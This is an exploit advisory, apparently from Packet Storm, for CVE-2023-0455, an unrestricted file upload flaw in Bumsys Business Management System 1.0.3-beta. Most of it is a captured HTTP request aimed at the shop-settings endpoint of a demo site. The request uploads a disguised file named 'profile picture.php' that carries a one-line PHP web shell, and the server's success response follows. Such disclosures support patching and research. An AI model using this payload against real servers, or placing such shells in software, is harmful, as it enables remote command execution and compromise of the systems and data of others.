Security
Headlines
HeadlinesLatestCVEs

Headline

Bumsys Business Management System 1.0.3-beta Shell Upload

Bumsys Business Management System version 1.0.3-beta suffers from a remote shell upload vulnerability.

Packet Storm
#csrf#vulnerability#web#ios#windows#apple#google#apache#git#php#auth#chrome#webkit#ssl

Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload
Google Dork : NA
Date: 19-01-2023
Exploit Author: AFFAN AHMED
Vendor Homepage: https://github.com/unilogies/bumsys
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip
Version: 1.0.3-beta
Tested on: Windows 11, XAMPP-8.2.0
CVE : CVE-2023-0455

================================
Steps_TO_Reproduce
================================

================================================================
Burpsuite-Request
================================================================
POST /xhr/?module=settings&page=updateShop HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
Content-Length: 1280
Sec-Ch-Ua: "Chromium";v="109", “Not_A Brand";v="99”
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
Accept: /
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: “Windows”
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/settings/shop-list/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopName"

TEST
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopAddress"

test
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCity"

testcity
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopState"

teststate
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPostalCode"

700056
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCountry"

testIND
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPhone"

895623122
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopEmail"

[email protected]
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopInvoiceFooter"

------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
Content-Type: image/png

<?php echo system($_REQUEST[‘dx’]); ?>

====================================================================================
Burpsuite-Response
====================================================================================
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2023 07:14:26 GMT
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65

<div class=’alert alert-success’>Shop successfully updated.</div>

====================================================================================

VIDEO-POC : https://youtu.be/nwxIoSlyllQ

Related news

CVE-2023-0455

Unrestricted Upload of File with Dangerous Type in GitHub repository unilogies/bumsys prior to v1.0.3-beta.

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6